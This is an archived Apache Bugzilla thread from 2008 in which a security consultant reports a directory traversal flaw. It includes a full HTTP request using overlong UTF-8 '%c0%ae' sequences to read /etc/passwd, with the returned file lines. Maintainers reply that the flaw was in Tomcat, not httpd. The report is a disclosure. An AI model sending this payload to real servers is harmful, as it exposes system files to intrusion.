You are viewing a plain text version of this content. The canonical link for it is here.
Posted to bugs@httpd.apache.org by bu...@apache.org on 2008/07/17 10:52:21 UTC
DO NOT REPLY [Bug 45417] New: Directory Traversal Vulnerability
https://issues.apache.org/bugzilla/show_bug.cgi?id=45417
Summary: Directory Traversal Vulnerability
Product: Apache httpd-2
Version: 2.2.0
Platform: Other
OS/Version: Linux
Status: NEW
Severity: critical
Priority: P1
Component: All
AssignedTo: bugs@httpd.apache.org
ReportedBy: bar4mi@gmail.com
CC: bar4mi@gmail.com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Dear Bugzilla
I'm Simon Ryeo who is a computer security consultant in South Korea.
(My main job is penetration testing.)
I found a critical security problem on Apache 2.2.0.
I'd like to find it's major reason but I don't have any time because of my
project.
Also, I couldn't test it on last version(2.2.9)
[Overview]
An attacker can get important files(/etc/passwd, etc.) of the system using
Apache 2.2.0.
He can do it just using '%c0%ae%c0%ae' which means 'dot-dot-slash'.
It is just the encoded directory traversal attack.
[Exploit]
An attacker just does request the wanted files with '%c0%ae%c0%ae'.
GET
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0
%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0
Accept: */*
Accept-Language: ko-KR
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: www.target.com
HTTP/1.1 200 OK
Content-Length: 1411
Date: Mon, 14 Jul 2008 08:05:05 GMT
Server: Apache
Last-Modified: Sun, 06 Jul 2008 08:26:01 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Language: ko
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...
[Environments]
It was rebuild with published apache 2.2.0 by user. He used below
configurations and systems.
1. build options
./configure --prefix=/usr/local/httpd-2.2.0 --enable-proxy
- --enable-module=so --disable-auth --enable-include --disable-env
- --disable-autoindex --disable-cgi --disable-negotiation --disable-imap
- --disable-actions --disable-userdir --enable-dos --enable-rewrite
2. Operation System: Redhat Enterprise
3. Apache Version: apache 2.2.0
4. Httpd modules list
core.c
mod_auth_file.c
mod_authn_default.c
mod_authz_host.c
mod_authz_groupfile.c
mod_authz_user.c
mod_authz_default.c
mod_auth_basic.c
mod_include.c
mod_filter.c
mod_log_config.c
mod_setenvif.c
mod_proxy.c
mod_proxy_ftp.c
mod_proxy_http.c
mod_proxy_ajp.c
mod_proxy_balancer.c
prefork.c
http_core.c
mod_mime.c
mod_status.c
mod_asis.c
mod_dir.c
mod_alias.c
mod_rewrite.c
mod_so.c
6. Additional modules
mod_jk.so (version 1.2.1.5)
mod_evasive20.so (version 1.10.1)
[My additional contact information]
barami@ahnlab.com (Ahnlab, Inc.)
bar4mi@apache-kr.org (The Apache Korea Group)
-----BEGIN PGP SIGNATURE-----
Version: 9.8.3.4028
wj8DBQFIfwYCzuoR/xLtCioRAoCIAJ4ti9JR1sKFYzgcarbptRnpFYytJACgkT57
wqY9b4bRKkVwkEEQNlBZ1Cc=
=RQMK
-----END PGP SIGNATURE-----
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 9.8.3.4028
mQGiBD6QuAoRBADBP14ij7t8YnnD0O1PMkWzsq/SXhui0UtBl4QSdPNvogdhKm3U
Vp4Pl6ABj7ROxVAabvqZPgY8qOsWIQEbcc9fqQtgMAKVWImKeC2o0fWnG4/7Ba7u
elOpXzFiVdF9aBKrlwwT4YF2rem9xPhuyxcFRPV4aDNH6VdnFK/0qQSKlwCg/2tt
AJk8avB1RjJK1PZWvo3ZxNkD/2+R/Ps9HlNezxyinwXb1hFPNOlXwOtjupxOt6gZ
c5iaWPi8eg8Fxna80/ccxwrHWFdkNCdgcw40N65/UofjFueG7pFh6kBCnwbY1MHs
bU9CsucdOyLZSDczeZmaHgQD1zcsDXq+EfFCFEMtfmZaksA5cT2NvyEWYVcBk6Dm
nXaABACAJjg7+lFwzXynUuTH+v5TOM8f3Wf8u5ZA3IT4dGCTvq2p4CnkH9ZQdbrl
nqoco3b3rAcAiCNJTGeRQA7VS90QvGp3sOpFebGh5Y79B0kjA2/TdAg7tkQqnlZK
Yw7hMBjAucTU4hqrnkI8xSh8DmMkTGz09xoCg2ezSA4OMUXSBLQgU3VuZy1Lb28g
UnllbyA8YmFyNG1pQGdtYWlsLmNvbT6JAHcEEBECADcFAkfrX1IICwkIBwMCAQoC
GQEZGGxkYXA6Ly9rZXlzZXJ2ZXIucGdwLmNvbQUeAQAAAAQVCAkKAAoJEM7qEf8S
7QoqPKIAoI15i04s8OZOWfTmTkQRIvlv7zt2AJ0ZQfreA0/K4MEzRQM7cDuKpj0C
FYkBIgQQAQIADAUCR+tfGAUDABJ1AAAKCRCXELibyletfNB+B/0eLgIhd/2j9/Lf
FnF6O989xduaLi5pf8CPpjZOeJEWJZd+mJuopoiGV5Zn2z4Cz1yWYinqGmEij6P2
uqx2FcQngk85XZD3Gym4O4Dh6nVv9E1MutQPlIhpDHfCqlX9nR4DGmih8LsOSIRo
zP9shfvQR2E2AmyD0Mt2a0np0YuUpEoUo609bZnLQqs0OmuznnqAvSlnAGNDaFxz
2pZaD6FEguu41yJAEHMbVa9zZisd42GTezjezWlg+S9CrZK8BSF4yas4LWuR1vy1
SzjRPxLxV7FBWrkisnxmg3CVSU3m+jYrVOxXRqp0aEv2s7t2fbab6Hd4MfoFzhWG
gsxlBm07tCFTdW5nLUtvbyBSeWVvIDxiYXJhbWlAYWhubGFiLmNvbT6JAG8EEBEC
AC8FAkfrX1IICwkIBwMCAQoZGGxkYXA6Ly9rZXlzZXJ2ZXIucGdwLmNvbQUeAQAA
AAAKCRDO6hH/Eu0KKgMqAKDrVa6/ipKl2PCsSzwtxSGtQyenXACfUCE57ZiAoo6N
9xJpFH8IYhpysf20GmJhcjRtaSA8YmFyYW1pQGFobmxhYi5jb20+iQB0BBARAgA0
BQJH619SCAsJCAcDAgEKGRhsZGFwOi8va2V5c2VydmVyLnBncC5jb20FHgEAAAAE
FQgJCgAKCRDO6hH/Eu0KKiE6AJ9or+APFAQ8kyZtqYuv41oEEM1tYQCg4oOw0zZ0
eyoceGTSRk38iG4CtlmJASIEEAECAAwFAkfrXxgFAwASdQAACgkQlxC4m8pXrXwb
6Af/Wb37fiSmAnhVLFd24u0fxG0IjlgwzrSHF5oMd8WHmxcnCyuO4TtwN7Itd8f5
6L/ACOWEHpwtRWUXsmH1afpEkQ/Eq1B9e4Pu/dZ0G3brv+EruPI/6o7lJQK1EVY0
psPcedSxnrrIgczBEFs6G7f1PJ5CVLEwAaYheUL8HjzhMV7hqObCkSozyI9a7Ur+
UbRfpTb1goNsJ8dqMmkdqKG5HLgq4uhPmCKNJONPFUR5kK6YnUGMMZxahUAqynsg
mb8xm+UtQkSVeDIJFDHw4PBCfKhkM8/vfG1hKKznzj1kkD60hSj7FN0W2NG2JqSd
LaLndvFM3+Ac/oZltJTtkfJnGrkCDQQ+kLgLEAgA9kJXtwh/CBdyorrWqULzBej5
UxE5T7bxbrlLOCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1
WV/cdlJPPT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01ue
jaClcjrUGvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJ
I8BD8KVbGI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaG
xAMZyAcpesqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwAC
Agf/WPJnSTeirfzkwsGcbNFWY8APKInAW8A/7F5jMUk2eq8SMzjNfaPi2MeNfFe6
s6TLV8IE2+oDMndCU8mOz8Lkj6mD1NUatvsvx69icV+F0o3ralJeHU0OuF7YyADR
0xKqghgZ//5TdjnfBMzDWT6N0hpvq5xWIx7C+Pb6OFHJFDiUjx0JsKtlzNp0X6lV
O+LdQQOqFPzbvzMYVWogaYa6xluQogDUyISrxZ/KTpml2sL+TZiXfraMd70UVRMs
w9Fod0YcBqpmygZNCFPDivmKtAa2Hyz1J9lj7RAPXg+IDU6Y8FcrxyY4GREpom8g
qeZl2IKFDH1hqiW70J8K7zVZCYkATAQYEQIADAUCPpC4CwUbDAAAAAAKCRDO6hH/
Eu0KKvdzAJ9xlXW8enejHPpi7gFjW6MidV6NVgCfZSp8P0qVHjYpbBnb4bakf1kS
Z9c=
=JQcw
-----END PGP PUBLIC KEY BLOCK-----
--
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
DO NOT REPLY [Bug 45417] Directory Traversal Vulnerability
Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=45417
Will Rowe <wr...@apache.org> changed:
What |Removed |Added
----------------------------------------------------------------------------
Status|RESOLVED |CLOSED
--- Comment #2 from Will Rowe <wr...@apache.org> 2008-08-02 16:01:25 PST ---
Note there is a workaround with the Tomcat 6.0.18 release of last week that
will allow you to use UTF8 URLs again, safely. The flaw was on the Java side
and not as you reported on the httpd side.
--
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
DO NOT REPLY [Bug 45417] Directory Traversal Vulnerability
Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=45417
--- Comment #1 from Joe Orton <jo...@redhat.com> 2008-07-17 02:46:22 PST ---
1) what configuration is being used? Please attach the httpd.conf
2) please try removing the non-httpd modules:
mod_jk.so (version 1.2.1.5)
mod_evasive20.so (version 1.10.1)
and see whether you can still reproduce this.
--
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
DO NOT REPLY [Bug 45417] Directory Traversal Vulnerability
Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=45417
jfclere <jf...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
CC| |jfclere@gmail.com
--
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
DO NOT REPLY [Bug 45417] Directory Traversal Vulnerability
Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=45417
Simon <ba...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
Status|NEW |RESOLVED
Resolution| |WORKSFORME
--
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org